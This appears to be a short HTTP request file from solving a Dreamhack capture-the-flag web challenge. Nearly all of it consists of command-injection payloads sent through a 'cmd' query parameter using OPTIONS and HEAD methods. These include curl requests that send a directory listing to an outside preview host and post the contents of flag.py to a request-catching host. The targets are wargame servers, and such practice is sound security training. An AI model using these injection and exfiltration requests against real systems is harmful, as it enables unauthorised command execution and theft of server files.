###

OPTIONS http://host3.dreamhack.games:14162/?cmd=ls


###

HEAD https://grandff-dreamhack-web-wxr6vxpph99qw-8000.githubpreview.dev/?cmd=vi test.py


###


HEAD http://host3.dreamhack.games:11724/?cmd=curl https://grandff-dreamhack-web-wxr6vxpph99qw-8000.githubpreview.dev/?result=$(dir)


###

HEAD http://host3.dreamhack.games:14162/?cmd=curl https://khunioz.request.dreamhack.games/ -d "$(cat flag.py)"


